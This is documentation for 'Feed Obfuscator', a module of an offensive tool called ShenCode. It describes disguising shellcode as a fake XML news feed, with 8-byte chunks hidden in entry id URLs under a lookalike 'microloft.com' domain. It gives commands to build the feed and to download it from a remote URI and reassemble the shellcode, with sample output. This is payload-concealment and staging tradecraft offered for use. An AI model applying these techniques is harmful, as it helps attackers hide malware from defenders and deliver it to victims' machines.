ShenCode - Feed

Feed Obfuscator

Description

With the feed obfuscator, the shellcode is split and disguised as a feed in an XML file. The code is appended to the article.id in chunks of 8 bytes each:

  <entry>
    <title type="html">Title 1</title>
    <link href="https://www.microloft.com/01/02/title1" rel="alternate" type="text/html" title="Title 1"/>
    <published>2024-12-22 12:43:09.681481</published>
    <updated>2024-12-22 12:43:09.681481</updated>
    <id>https://www.microloft.com/554889e54883ec40</id>
  </entry>
  <entry>
    <title type="html">Title 2</title>
    <link href="https://www.microloft.com/02/02/title2" rel="alternate" type="text/html" title="Title 1"/>
    <published>2024-12-22 12:43:09.681481</published>
    <updated>2024-12-22 12:43:09.681481</updated>
    <id>https://www.microloft.com/4831c0488945f848</id>
  </entry>

The code can also be reassembled by passing the parameters --reassemble and --uri. The feed is then downloaded and processed accordingly.

Command

Generate Fake Feed

python shencode.py --input shellcode.raw --output feed.xml

Reassemble Shellcode from Fake Feed

python shencode.py --output shellcode.raw --reassemble --uri https://www.site.com/feed.xml

Example

python shencode.py feed -i calc.raw -o feed.xml

[+] [OBF-RSS] File exists
[i] [OBF-RSS] File: dev\calc.raw
[i] [OBF-RSS] Hash: 7c1bb19fe6606cfe29e750326db2972c4743e623
[+] [OBF-RSS] File exists
[i] [OBF-RSS] File: dev\feed.xml
[i] [OBF-RSS] Hash: 17d3ec2aeb31dad148d4547a1ee8c2edb8846f4b